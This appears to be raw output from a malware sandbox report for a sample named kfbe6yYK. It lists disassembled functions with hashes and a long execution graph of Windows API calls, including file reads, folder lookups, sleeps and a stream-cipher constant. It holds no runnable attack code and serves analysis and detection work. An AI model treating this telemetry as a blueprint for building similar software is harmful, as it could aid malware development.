                                                                                  • __IsNonwritableInCurrentImage.LIBCMT ref: 01003FF3
                                                                                  • _ValidateLocalCookies.LIBCMT ref: 01004048
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000033.00000002.4523670198.0000000001001000.00000040.00000001.01000000.00000010.sdmp, Offset: 01000000, based on PE: true
                                                                                  • Associated: 00000033.00000002.4523637743.0000000001000000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                  • Associated: 00000033.00000002.4523714781.0000000001014000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                  • Associated: 00000033.00000002.4523810523.0000000001052000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                  • Associated: 00000033.00000002.4523947252.00000000010E4000.00000020.00000001.01000000.00000010.sdmpDownload File
                                                                                  • Associated: 00000033.00000002.4524211762.0000000001268000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_51_2_1000000_kfbe6yYK.jbxd
                                                                                  Similarity
                                                                                  • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                  • String ID: csm
                                                                                  • API String ID: 1170836740-1018135373
                                                                                  • Opcode ID: e7fcd6fc8ebeace9b78732678fe888e6859ec1e616ff4cf6ea290b6179943d97
                                                                                  • Instruction ID: 9ada0dc93400ba17c3a3248ffcce133cc3432b68dacf68c568c55b0f61bb28dd
                                                                                  • Opcode Fuzzy Hash: e7fcd6fc8ebeace9b78732678fe888e6859ec1e616ff4cf6ea290b6179943d97
                                                                                  • Instruction Fuzzy Hash: 8F41D130A002099FEF12DF68C884AAEBFF5BF44324F148199E994AF3D1D735A945CB90
                                                                                  Function 0100E660 Relevance: 7.7, APIs: 5, Instructions: 199COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000033.00000002.4523670198.0000000001001000.00000040.00000001.01000000.00000010.sdmp, Offset: 01000000, based on PE: true
                                                                                  • Associated: 00000033.00000002.4523637743.0000000001000000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                  • Associated: 00000033.00000002.4523714781.0000000001014000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                  • Associated: 00000033.00000002.4523810523.0000000001052000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                  • Associated: 00000033.00000002.4523947252.00000000010E4000.00000020.00000001.01000000.00000010.sdmpDownload File
                                                                                  • Associated: 00000033.00000002.4524211762.0000000001268000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_51_2_1000000_kfbe6yYK.jbxd
                                                                                  Similarity
                                                                                  • API ID: __freea$__alloca_probe_16
                                                                                  • String ID:
                                                                                  • API String ID: 3509577899-0
                                                                                  • Opcode ID: 20ad5174bcfa03be59ff9a2ba2115f869062f720ca4d28ec7b24d0a122dd6722
                                                                                  • Instruction ID: 2ac3a95a786b3f10dc4d5369eeeec1c0efa261bb6a0a55ac5b38cab6ef7fe43b
                                                                                  • Opcode Fuzzy Hash: 20ad5174bcfa03be59ff9a2ba2115f869062f720ca4d28ec7b24d0a122dd6722
                                                                                  • Instruction Fuzzy Hash: 6151B172600216ABFB269F58CC40EBB3AE9EF85750F1549A9FD88B71C0E734DD5187A0
                                                                                  Function 01002C10 Relevance: 5.1, Strings: 4, Instructions: 149COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000033.00000002.4523670198.0000000001001000.00000040.00000001.01000000.00000010.sdmp, Offset: 01000000, based on PE: true
                                                                                  • Associated: 00000033.00000002.4523637743.0000000001000000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                  • Associated: 00000033.00000002.4523714781.0000000001014000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                  • Associated: 00000033.00000002.4523810523.0000000001052000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                  • Associated: 00000033.00000002.4523947252.00000000010E4000.00000020.00000001.01000000.00000010.sdmpDownload File
                                                                                  • Associated: 00000033.00000002.4524211762.0000000001268000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_51_2_1000000_kfbe6yYK.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: 2-by$expa$nd 3$te k
                                                                                  • API String ID: 0-3581043453
                                                                                  • Opcode ID: 1d2ead586354e094e53a6cdff53577e5db3883a53e27982f98e141f046ad2411
                                                                                  • Instruction ID: 274288ca5c7450311b8ddb4ff7960e076d53f789837845c7340901969e9ed53d
                                                                                  • Opcode Fuzzy Hash: 1d2ead586354e094e53a6cdff53577e5db3883a53e27982f98e141f046ad2411
                                                                                  • Instruction Fuzzy Hash: 3A51E160A086E65DD76D8B3E4479274FFE0BB49242B08439FE1FB85182D66CD294DBB0
                                                                                  Function 010C0C81 Relevance: 5.1, Strings: 4, Instructions: 66COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000033.00000002.4523810523.0000000001052000.00000040.00000001.01000000.00000010.sdmp, Offset: 01000000, based on PE: true
                                                                                  • Associated: 00000033.00000002.4523637743.0000000001000000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                  • Associated: 00000033.00000002.4523670198.0000000001001000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                  • Associated: 00000033.00000002.4523714781.0000000001014000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                  • Associated: 00000033.00000002.4523947252.00000000010E4000.00000020.00000001.01000000.00000010.sdmpDownload File
                                                                                  • Associated: 00000033.00000002.4524211762.0000000001268000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_51_2_1000000_kfbe6yYK.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: L$.`$l$n
                                                                                  • API String ID: 0-3278736651
                                                                                  • Opcode ID: 9364ae0b4dd824291c97eb3851858b6d98ce9c0fab07c1da8a1ae1ce5c0d1a9f
                                                                                  • Instruction ID: a4779ee73ad49f99ba662babbf4b4da148ce9293823202e7dc514eb88085361e
                                                                                  • Opcode Fuzzy Hash: 9364ae0b4dd824291c97eb3851858b6d98ce9c0fab07c1da8a1ae1ce5c0d1a9f
                                                                                  • Instruction Fuzzy Hash: 74215B795087648AC724BF68A4955BEB7E6FFD4324F24442ED8C2C3146CB315823D794

                                                                                  Execution Graph

                                                                                  Execution Coverage:2.3%
                                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                                  Signature Coverage:1.7%
                                                                                  Total number of Nodes:2000
                                                                                  Total number of Limit Nodes:83
                                                                                  execution_graph 109193 416307 109196 47e64a LoadLibraryA 109193->109196 109195 41630f 109196->109195 109197 489090 109198 4890aa 109197->109198 109199 4890b1 109197->109199 109448 4893a0 130 API calls ctype 109198->109448 109201 4890c9 109199->109201 109449 489210 130 API calls ctype 109199->109449 109202 4890da 109201->109202 109205 489188 ctype 109201->109205 109207 4890f4 ctype 109202->109207 109450 489260 130 API calls ctype 109202->109450 109209 4352fe 109205->109209 109207->109207 109210 435308 __EH_prolog 109209->109210 109451 41ef1b 109210->109451 109212 435319 109462 41ebe5 109212->109462 109216 435331 __ftol 109479 4c5f18 109216->109479 109218 435355 109487 4146d6 109218->109487 109225 4353a6 109515 403af0 67 API calls 2 library calls 109225->109515 109226 435395 109227 4c5fe3 ctype 35 API calls 109226->109227 109229 4353a1 109227->109229 109533 41eea7 130 API calls 109229->109533 109230 4353b0 109231 435590 109230->109231 109232 4353de 109230->109232 109233 435679 109231->109233 109234 435599 109231->109234 109236 435570 109232->109236 109237 4353e7 109232->109237 109240 4356e9 109233->109240 109241 43567e 109233->109241 109238 435655 109234->109238 109239 43559f 109234->109239 109245 4c6033 ctype 35 API calls 109236->109245 109243 4353f0 109237->109243 109244 4354bc 109237->109244 109246 4c6033 ctype 35 API calls 109238->109246 109247 435639 109239->109247 109248 4355a8 109239->109248 109252 4c6033 ctype 35 API calls 109240->109252 109249 435683 109241->109249 109250 4356cc 109241->109250 109242 435a64 109534 4815f0 109242->109534 109253 4354a0 109243->109253 109254 4353f6 109243->109254 109256 4354c5 109244->109256 109257 435554 109244->109257 109255 43557d 109245->109255 109258 435662 109246->109258 109270 4c6033 ctype 35 API calls 109247->109270 109259 43561d 109248->109259 109260 4355ac 109248->109260 109263 435686 109249->109263 109264 4356af 109249->109264 109261 4c6033 ctype 35 API calls 109250->109261 109267 4356f6 109252->109267 109265 4c6033 ctype 35 API calls 109253->109265 109268 435484 109254->109268 109269 4353fe 109254->109269 109271 4c6033 ctype 35 API calls 109255->109271 109272 4354ca 109256->109272 109273 435538 109256->109273 109262 4c6033 ctype 35 API calls 109257->109262 109276 4c6033 ctype 35 API calls 109258->109276 109284 4c6033 ctype 35 API calls 109259->109284 109277 4355b1 109260->109277 109278 4355fd 109260->109278 109283 4356d9 109261->109283 109285 43555d 109262->109285 109279 435689 109263->109279 109295 4c6033 ctype 35 API calls 109263->109295 109280 4c6033 ctype 35 API calls 109264->109280 109286 4354a9 109265->109286 109266 435a6f 109314 4c5eaa ctype 32 API calls 109266->109314 109287 4c6033 ctype 35 API calls 109267->109287 109282 4c6033 ctype 35 API calls 109268->109282 109288 435403 109269->109288 109289 435468 109269->109289 109290 435642 109270->109290 109351 435426 109271->109351 109274 435518 109272->109274 109275 4354ce 109272->109275 109281 4c6033 ctype 35 API calls 109273->109281 109296 4c6033 ctype 35 API calls 109274->109296 109291 4354d1 109275->109291 109292 4354f8 109275->109292 109276->109351 109293 4355b6 109277->109293 109294 4355d9 109277->109294 109299 4c6033 ctype 35 API calls 109278->109299 109521 403d43 56 API calls ctype 109279->109521 109298 4356bc 109280->109298 109300 435541 109281->109300 109301 43548d 109282->109301 109302 4c6033 ctype 35 API calls 109283->109302 109303 435626 109284->109303 109304 4c6033 ctype 35 API calls 109285->109304 109305 4c6033 ctype 35 API calls 109286->109305 109287->109351 109306 435407 109288->109306 109307 43544c 109288->109307 109297 4c6033 ctype 35 API calls 109289->109297 109308 4c6033 ctype 35 API calls 109290->109308 109291->109279 109326 4c6033 ctype 35 API calls 109291->109326 109310 4c6033 ctype 35 API calls 109292->109310 109293->109279 109328 4c6033 ctype 35 API calls 109293->109328 109313 4c6033 ctype 35 API calls 109294->109313 109312 43569f 109295->109312 109315 435525 109296->109315 109316 435471 109297->109316 109317 4c6033 ctype 35 API calls 109298->109317 109318 43560a 109299->109318 109319 4c6033 ctype 35 API calls 109300->109319 109320 4c6033 ctype 35 API calls 109301->109320 109302->109351 109321 4c6033 ctype 35 API calls 109303->109321 109304->109351 109305->109351 109322 435430 109306->109322 109323 43540c 109306->109323 109311 4c6033 ctype 35 API calls 109307->109311 109308->109351 109329 435505 109310->109329 109330 435455 109311->109330 109331 4c6033 ctype 35 API calls 109312->109331 109332 4355e6 109313->109332 109333 435a8a 109314->109333 109334 4c6033 ctype 35 API calls 109315->109334 109335 4c6033 ctype 35 API calls 109316->109335 109317->109351 109336 4c6033 ctype 35 API calls 109318->109336 109319->109351 109320->109351 109321->109351 109327 4c6033 ctype 35 API calls 109322->109327 109323->109279 109516 4c6033 109323->109516 109324 4c6033 ctype 35 API calls 109324->109279 109325 435717 109522 403d6d 56 API calls ctype 109325->109522 109339 4354e5 109326->109339 109340 435439 109327->109340 109341 4355c6 109328->109341 109342 4c6033 ctype 35 API calls 109329->109342 109343 4c6033 ctype 35 API calls 109330->109343 109331->109351 109344 4c6033 ctype 35 API calls 109332->109344 109345 4c5eaa ctype 32 API calls 109333->109345 109334->109351 109335->109351 109336->109351 109348 4c6033 ctype 35 API calls 109339->109348 109349 4c6033 ctype 35 API calls 109340->109349 109350 4c6033 ctype 35 API calls 109341->109350 109342->109351 109343->109351 109344->109351 109352 435a96 109345->109352 109347 435722 109523 403d97 56 API calls ctype 109347->109523 109348->109351 109349->109351 109350->109351 109351->109324 109353 4c6033 ctype 35 API calls 109353->109351 109355 43572d 109524 403e6d 90 API calls 2 library calls 109355->109524 109357 435741 109358 435795 GetVersionExA 109357->109358 109359 4c5f18 ctype 67 API calls 109357->109359 109360 4357b4 109358->109360 109361 435a20 109358->109361 109362 435755 109359->109362 109526 4af56e 29 API calls 2 library calls 109360->109526 109364 4c5eaa ctype 32 API calls 109361->109364 109525 40414b 94 API calls 2 library calls 109362->109525 109365 435a35 109364->109365 109368 4c5eaa ctype 32 API calls 109365->109368 109367 4357c1 109367->109361 109374 4358e0 109367->109374 109375 4357e4 109367->109375 109370 435a41 109368->109370 109369 435767 109371 4c5fe3 ctype 35 API calls 109369->109371 109372 4c5eaa ctype 32 API calls 109370->109372 109373 435774 109371->109373 109376 435a4d 109372->109376 109378 4c5eaa ctype 32 API calls 109373->109378 109377 43595e 109374->109377 109383 435960 109374->109383 109384 4358eb 109374->109384 109379 4358c7 109375->109379 109380 4357ea 109375->109380 109532 404bfb 34 API calls 2 library calls 109376->109532 109527 403d43 56 API calls ctype 109377->109527 109385 435780 109378->109385 109381 4c6033 ctype 35 API calls 109379->109381 109386 435853 109380->109386 109387 4357ef 109380->109387 109388 4358d0 109381->109388 109392 4c6033 ctype 35 API calls 109383->109392 109384->109377 109396 4358f8 109384->109396 109397 43593f 109384->109397 109385->109358 109390 435789 109385->109390 109386->109377 109406 4358ab 109386->109406 109407 435869 109386->109407 109391 435837 109387->109391 109422 4357f1 109387->109422 109394 4c6033 ctype 35 API calls 109388->109394 109399 4c5fe3 ctype 35 API calls 109390->109399 109395 4c6033 ctype 35 API calls 109391->109395 109393 43596d 109392->109393 109400 4c6033 ctype 35 API calls 109393->109400 109401 43582d 109394->109401 109402 435840 109395->109402 109403 435926 109396->109403 109404 4358fd 109396->109404 109408 4c6033 ctype 35 API calls 109397->109408 109398 4359a3 109528 403d6d 56 API calls ctype 109398->109528 109399->109358 109400->109401 109420 4c6033 ctype 35 API calls 109401->109420 109409 4c6033 ctype 35 API calls 109402->109409 109413 4c6033 ctype 35 API calls 109403->109413 109404->109377 109423 4c6033 ctype 35 API calls 109404->109423 109415 4c6033 ctype 35 API calls 109406->109415 109411 43588f 109407->109411 109412 43586c 109407->109412 109414 435948 109408->109414 109409->109401 109410 4359ae 109529 403d97 56 API calls ctype 109410->109529 109418 4c6033 ctype 35 API calls 109411->109418 109412->109377 109425 4c6033 ctype 35 API calls 109412->109425 109417 43592f 109413->109417 109419 4c6033 ctype 35 API calls 109414->109419 109421 4358b4 109415->109421 109426 4c6033 ctype 35 API calls 109417->109426 109427 435898 109418->109427 109419->109401 109420->109377 109428 4c6033 ctype 35 API calls 109421->109428 109422->109377 109429 4c6033 ctype 35 API calls 109422->109429 109430 435916 109423->109430 109424 4359b9 109530 403e6d 90 API calls 2 library calls 109424->109530 109432 43587c 109425->109432 109426->109401 109433 4c6033 ctype 35 API calls 109427->109433 109428->109401 109434 435824 109429->109434 109435 4c6033 ctype 35 API calls 109430->109435 109437 4c6033 ctype 35 API calls 109432->109437 109433->109401 109438 4c6033 ctype 35 API calls 109434->109438 109435->109401 109436 4359cd 109436->109361 109439 4c5f18 ctype 67 API calls 109436->109439 109437->109401 109438->109401 109440 4359e1 109439->109440 109531 40414b 94 API calls 2 library calls 109440->109531 109442 4359f2 109443 4c5fe3 ctype 35 API calls 109442->109443 109444 4359ff 109443->109444 109445 4c5eaa ctype 32 API calls 109444->109445 109446 435a0b 109445->109446 109446->109361 109447 4c5fe3 ctype 35 API calls 109446->109447 109447->109361 109448->109199 109449->109201 109450->109207 109452 4815f0 130 API calls 109451->109452 109453 41ef2b 109452->109453 109539 481770 109453->109539 109456 4815f0 130 API calls 109457 41ef41 109456->109457 109458 481770 130 API calls 109457->109458 109459 41ef49 109458->109459 109460 41ef6c 109459->109460 109543 481ae0 130 API calls 109459->109543 109460->109212 109463 41ebef __EH_prolog 109462->109463 109464 41ec55 109463->109464 109557 4c9c03 66 API calls ctype 109463->109557 109465 4c5eaa ctype 32 API calls 109464->109465 109467 41ec61 109465->109467 109469 4c5eaa ctype 32 API calls 109467->109469 109468 41ec1c 109468->109464 109558 4c2c3a 109468->109558 109470 41ec6d 109469->109470 109476 41ee69 109470->109476 109699 481340 109476->109699 109480 4c5f2c 109479->109480 109486 4c5f3f ctype 109479->109486 109481 4c5f36 109480->109481 109482 4c5f41 lstrlen 109480->109482 109704 4c9c03 66 API calls ctype 109481->109704 109484 4c5f4e 109482->109484 109482->109486 109485 4c5d17 ctype 31 API calls 109484->109485 109485->109486 109486->109218 109705 4aef44 109487->109705 109489 4146e0 SHGetSpecialFolderLocation 109490 414779 109489->109490 109491 41470c SHGetPathFromIDList 109489->109491 109492 4c5c1f ctype 36 API calls 109490->109492 109491->109490 109493 414720 SHGetMalloc 109491->109493 109494 414786 109492->109494 109496 414737 lstrlen 109493->109496 109495 4c5eaa ctype 32 API calls 109494->109495 109497 414795 109495->109497 109499 414759 lstrlen 109496->109499 109500 41476a 109496->109500 109502 4c5fe3 109497->109502 109499->109500 109501 4c6033 ctype 35 API calls 109500->109501 109501->109490 109503 4c5ff3 109502->109503 109508 435380 109502->109508 109504 4c600a 109503->109504 109505 4c6017 109503->109505 109706 4c5fb6 109504->109706 109709 4c5de1 32 API calls ctype 109505->109709 109510 4c5eaa 109508->109510 109509 4c601e InterlockedIncrement 109509->109508 109511 4c5eba InterlockedDecrement 109510->109511 109512 43538c 109510->109512 109511->109512 109513 4c5ec8 109511->109513 109512->109225 109512->109226 109717 4c5d99 31 API calls ctype 109513->109717 109515->109230 109517 4c603f 109516->109517 109518 4c6043 lstrlen 109516->109518 109519 4c5fb6 ctype 34 API calls 109517->109519 109518->109517 109520 43541d 109519->109520 109520->109353 109521->109325 109522->109347 109523->109355 109524->109357 109525->109369 109526->109367 109527->109398 109528->109410 109529->109424 109530->109436 109531->109442 109532->109229 109533->109242 109535 4815f8 109534->109535 109536 481606 109534->109536 109535->109266 109718 4815a0 109536->109718 109540 481780 109539->109540 109544 48a7d0 109540->109544 109542 41ef36 109542->109456 109543->109460 109545 48a7ec 109544->109545 109546 48a7e1 109544->109546 109548 48a7f8 ctype 109545->109548 109549 48a821 109545->109549 109554 482a80 130 API calls ctype 109546->109554 109551 48a82f 109548->109551 109555 48a840 130 API calls ctype 109548->109555 109556 48a940 130 API calls ctype 109549->109556 109551->109542 109553 48a819 109553->109542 109554->109545 109555->109553 109556->109551 109557->109468 109567 4c28ed 109558->109567 109561 4c5c1f 109562 4c5c3c 109561->109562 109563 4c5c2e InterlockedIncrement 109561->109563 109565 4c6033 ctype 35 API calls 109562->109565 109564 41ec4a 109563->109564 109566 46da16 130 API calls 2 library calls 109564->109566 109565->109564 109566->109464 109579 4c2906 _rand ctype _wctomb_s 109567->109579 109568 4c2c0a 109581 4c62da 109568->109581 109576 4b0298 6 API calls 109576->109579 109577 4c2b2d lstrlen 109577->109579 109578 4af2db 6 API calls 109578->109579 109579->109568 109579->109576 109579->109577 109579->109578 109597 4b1d03 29 API calls ctype 109579->109597 109598 4b00aa 48 API calls ctype 109579->109598 109582 4c62ed 109581->109582 109586 4c2c17 109582->109586 109599 4c5d17 109582->109599 109584 4c6304 ctype 109606 4c5e12 32 API calls ctype 109584->109606 109587 4b547c 109586->109587 109617 4b8de9 109587->109617 109590 4b54b3 109592 4c6329 109590->109592 109692 4c5e53 109592->109692 109594 4c6331 109595 4c633a lstrlen 109594->109595 109596 41ec2f 109594->109596 109595->109596 109596->109464 109596->109561 109597->109579 109598->109579 109600 4c5d23 109599->109600 109602 4c5d2c 109599->109602 109600->109584 109601 4c5d34 109607 4a8f6c 109601->109607 109602->109601 109604 4c5d73 109602->109604 109614 4c512e 29 API calls ctype 109604->109614 109606->109586 109615 4aef44 109607->109615 109609 4a8f76 RtlEnterCriticalSection 109610 4a8f94 109609->109610 109611 4a8fc5 RtlLeaveCriticalSection 109609->109611 109616 4c3bc1 29 API calls ctype 109610->109616 109611->109600 109613 4a8fa6 109613->109611 109614->109600 109615->109609 109616->109613 109618 4b54a9 109617->109618 109622 4b8e11 __aulldiv __aullrem _rand ctype 109617->109622 109618->109590 109626 4b8cd1 44 API calls ctype 109618->109626 109619 4b9587 44 API calls ctype 109619->109622 109622->109618 109622->109619 109623 4b95ed 44 API calls ctype 109622->109623 109624 4b95bc 44 API calls ctype 109622->109624 109625 4b1e11 39 API calls ctype 109622->109625 109627 4af1a1 109622->109627 109630 4af0b8 109622->109630 109623->109622 109624->109622 109625->109622 109626->109590 109647 4af1b3 109627->109647 109631 4af192 109630->109631 109632 4af0e6 109630->109632 109631->109622 109633 4af12b 109632->109633 109634 4af0f0 109632->109634 109635 4af11c 109633->109635 109637 4b62f4 ctype 28 API calls 109633->109637 109636 4b62f4 ctype 28 API calls 109634->109636 109635->109631 109638 4af184 RtlFreeHeap 109635->109638 109639 4af0f7 ___free_lc_time 109636->109639 109642 4af137 ___free_lc_time 109637->109642 109638->109631 109640 4af111 109639->109640 109688 4b700a VirtualFree VirtualFree HeapFree ___free_lc_time 109639->109688 109689 4af122 RtlLeaveCriticalSection ctype 109640->109689 109641 4af163 109691 4af17a RtlLeaveCriticalSection ctype 109641->109691 109642->109641 109690 4b7d91 VirtualFree HeapFree VirtualFree ___free_lc_time 109642->109690 109648 4af1ba _rand 109647->109648 109650 4af1b0 109647->109650 109648->109650 109651 4af1df 109648->109651 109650->109622 109652 4af20c 109651->109652 109653 4af24f 109651->109653 109659 4af23a 109652->109659 109669 4b62f4 109652->109669 109653->109659 109660 4af271 109653->109660 109655 4af222 109684 4b7333 5 API calls _rand 109655->109684 109656 4af2be RtlAllocateHeap 109658 4af241 109656->109658 109658->109648 109659->109656 109659->109658 109662 4b62f4 ctype 28 API calls 109660->109662 109661 4af22d 109685 4af246 RtlLeaveCriticalSection ctype 109661->109685 109663 4af278 109662->109663 109686 4b7dd6 6 API calls 2 library calls 109663->109686 109666 4af28b 109687 4af2a5 RtlLeaveCriticalSection ctype 109666->109687 109668 4af298 109668->109658 109668->109659 109670 4b634a RtlEnterCriticalSection 109669->109670 109671 4b630c 109669->109671 109670->109655 109672 4af1a1 ctype 27 API calls 109671->109672 109673 4b6314 109672->109673 109674 4b6322 109673->109674 109675 4b21ae _rand 7 API calls 109673->109675 109676 4b62f4 ctype 27 API calls 109674->109676 109675->109674 109677 4b632a 109676->109677 109678 4b633b 109677->109678 109679 4b6331 RtlInitializeCriticalSection 109677->109679 109681 4af0b8 ___free_lc_time 27 API calls 109678->109681 109680 4b6340 109679->109680 109682 4b6355 ctype RtlLeaveCriticalSection 109680->109682 109681->109680 109683 4b6348 109682->109683 109683->109670 109684->109661 109685->109659 109686->109666 109687->109668 109688->109640 109689->109635 109690->109641 109691->109635 109693 4c5e5f 109692->109693 109697 4c5e6e ctype 109692->109697 109698 4c5de1 32 API calls ctype 109693->109698 109695 4c5e64 109696 4c5d17 ctype 31 API calls 109695->109696 109696->109697 109697->109594 109698->109695 109700 481352 109699->109700 109701 41ee76 109700->109701 109703 48a710 41 API calls ctype 109700->109703 109701->109216 109703->109701 109704->109486 109705->109489 109710 4c5e81 109706->109710 109708 4c5fc4 ctype 109708->109508 109709->109509 109711 4c5e91 109710->109711 109712 4c5ea5 109711->109712 109716 4c5de1 32 API calls ctype 109711->109716 109712->109708 109714 4c5e9d 109715 4c5d17 ctype 31 API calls 109714->109715 109715->109712 109716->109714 109717->109512 109719 4815b9 109718->109719 109720 4815b3 109718->109720 109724 48c8d0 109719->109724 109728 489da0 130 API calls ctype 109720->109728 109725 48c8ea 109724->109725 109725->109725 109727 4815d5 109725->109727 109729 48c950 130 API calls ctype 109725->109729 109727->109266 109728->109719 109729->109727 109730 4a24e0 109731 4a250f 109730->109731 109732 4a2505 109730->109732 109733 4a2643 ReadFile 109731->109733 109734 4a262b 109731->109734 109737 4a2528 109731->109737 109740 4a266a 109733->109740 109737->109734 109754 4a3290 TlsGetValue 109737->109754 109755 4a32c0 TlsGetValue 109737->109755 109740->109734 109740->109737 109744 4a2729 109740->109744 109745 49d3e0 TlsGetValue 109740->109745 109749 49fe00 25 API calls 109740->109749 109743 4a2753 ReadFile 109743->109744 109744->109737 109744->109740 109744->109743 109750 4a2e00 12 API calls 109744->109750 109751 49d390 TlsGetValue 109744->109751 109746 49d3fa 109745->109746 109747 49d3f3 109745->109747 109746->109747 109748 49d405 CloseHandle 109746->109748 109747->109740 109748->109747 109749->109740 109750->109744 109752 49d3aa CreateFileA 109751->109752 109753 49d3a3 109751->109753 109752->109744 109753->109744 109754->109737 109755->109737 109756 4d4bb1 109761 4d4bbb 109756->109761 109758 4d4bb6 109769 4af01b 35 API calls 109758->109769 109760 4d4bcf 109762 4d4c2d GetVersion 109761->109762 109763 4d4c6e GetProcessVersion 109762->109763 109764 4d4c80 109762->109764 109763->109764 109770 4cb66c KiUserCallbackDispatcher GetSystemMetrics 109764->109770 109766 4d4c87 109777 4cb628 7 API calls 109766->109777 109768 4d4c91 LoadCursorA LoadCursorA 109768->109758 109769->109760 109771 4cb68b 109770->109771 109772 4cb692 109770->109772 109778 4d4bdb GetSystemMetrics GetSystemMetrics 109771->109778 109779 4d4c0b GetSystemMetrics GetSystemMetrics 109772->109779 109775 4cb690 109776 4cb697 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 109775->109776 109776->109766 109777->109768 109778->109775 109779->109776 109780 4b20a6 GetVersion 109812 4b6f3a HeapCreate 109780->109812 109782 4b2104 109783 4b2109 109782->109783 109784 4b2111 109782->109784 109832 4b21d3 8 API calls _rand 109783->109832 109824 4b6bdc 37 API calls _rand 109784->109824 109788 4b2116 109789 4b211a 109788->109789 109790 4b2122 109788->109790 109833 4b21d3 8 API calls _rand 109789->109833 109825 4bb4ea 34 API calls 2 library calls 109790->109825 109794 4b212c GetCommandLineA 109826 4bb3b8 37 API calls 2 library calls 109794->109826 109796 4b213c 109834 4bb16b 49 API calls 2 library calls 109796->109834 109798 4b2146 109827 4bb0b2 48 API calls 3 library calls 109798->109827 109800 4b214b 109801 4b2150 GetStartupInfoA 109800->109801 109828 4bb05a 48 API calls 109801->109828 109803 4b2162 109804 4b216b 109803->109804 109805 4b2174 GetModuleHandleA 109804->109805 109829 4c22fe 109805->109829 109809 4b218f 109836 4baee2 36 API calls _rand 109809->109836 109811 4b21a0 109813 4b6f5a 109812->109813 109814 4b6f90 109812->109814 109837 4b6df2 57 API calls 2 library calls 109813->109837 109814->109782 109816 4b6f5f 109817 4b6f69 109816->109817 109818 4b6f76 109816->109818 109838 4b6f97 RtlAllocateHeap 109817->109838 109820 4b6f93 109818->109820 109839 4b7ade 5 API calls ctype 109818->109839 109820->109782 109821 4b6f73 109821->109820 109823 4b6f84 HeapDestroy 109821->109823 109823->109814 109824->109788 109825->109794 109826->109796 109827->109800 109828->109803 109840 4cbe9f 109829->109840 109834->109798 109835 4b1b84 32 API calls ctype 109835->109809 109836->109811 109837->109816 109838->109821 109839->109821 109852 4caaeb 109840->109852 109848 4b2186 109848->109835 109849 4cbee6 110236 4d6bd3 60 API calls ctype 109849->110236 110237 4d3761 109852->110237 109855 4caafc 109857 4d373b 109855->109857 109856 4d373b ctype 28 API calls 109856->109855 109858 4d4878 ctype 21 API calls 109857->109858 109859 4d374a 109858->109859 109860 4cbeb1 109859->109860 110266 4d490d 109859->110266 109862 4d49cf SetErrorMode SetErrorMode 109860->109862 109863 4d373b ctype 28 API calls 109862->109863 109864 4d49e6 109863->109864 109865 4d373b ctype 28 API calls 109864->109865 109866 4d49f5 109865->109866 109867 4d4a1b 109866->109867 110274 4d4a32 109866->110274 109869 4d373b ctype 28 API calls 109867->109869 109870 4d4a20 109869->109870 109871 4cbec9 109870->109871 110293 4cab00 109870->110293 109871->109849 109873 479232 109871->109873 110228 49a520 109871->110228 109874 47923c __EH_prolog 109873->109874 109875 4c5f18 ctype 67 API calls 109874->109875 109876 479274 109875->109876 110323 4a8605 109876->110323 109883 4792b2 110607 4cdc20 38 API calls ctype 109883->110607 109884 4792ab 109885 49a520 6 API calls 109884->109885 109887 4792b0 109885->109887 110346 4b1fca GetLocalTime GetSystemTime 109887->110346 109892 4c2c3a 62 API calls 109893 4792f9 109892->109893 110355 4c2892 109893->110355 109896 479314 110358 4c281a 109896->110358 109897 479f58 110672 4cdc20 38 API calls ctype 109897->110672 109901 4c5fe3 ctype 35 API calls 109902 479338 109901->109902 109904 4c5eaa ctype 32 API calls 109902->109904 109903 4c5eaa ctype 32 API calls 109905 479f7c 109903->109905 109906 479344 109904->109906 109907 4c5eaa ctype 32 API calls 109905->109907 110369 4c2c4d 109906->110369 109909 479f88 109907->109909 109910 4c5eaa ctype 32 API calls 109909->109910 109912 479f93 109910->109912 109914 4c5eaa ctype 32 API calls 109912->109914 109913 4c5fe3 ctype 35 API calls 109915 47936b 109913->109915 110166 479b7e 109914->110166 109916 4c5f18 ctype 67 API calls 109915->109916 109917 47937d 109916->109917 110374 47a22e 109917->110374 109920 4c5f18 ctype 67 API calls 109921 4793b2 109920->109921 109922 47a22e 47 API calls 109921->109922 109923 4793bd 109922->109923 109924 4c5fe3 ctype 35 API calls 109923->109924 109925 4793ca 109924->109925 109926 4c5eaa ctype 32 API calls 109925->109926 109927 4793d6 109926->109927 109928 4793ea 109927->109928 110608 46dd46 130 API calls ctype 109927->110608 109930 4c5f18 ctype 67 API calls 109928->109930 109931 4793fb 109930->109931 109932 47a22e 47 API calls 109931->109932 109933 479406 109932->109933 109934 479416 Sleep 109933->109934 109935 4796e3 109933->109935 109936 47942f 109934->109936 109937 4c5f18 ctype 67 API calls 109935->109937 109939 479463 109936->109939 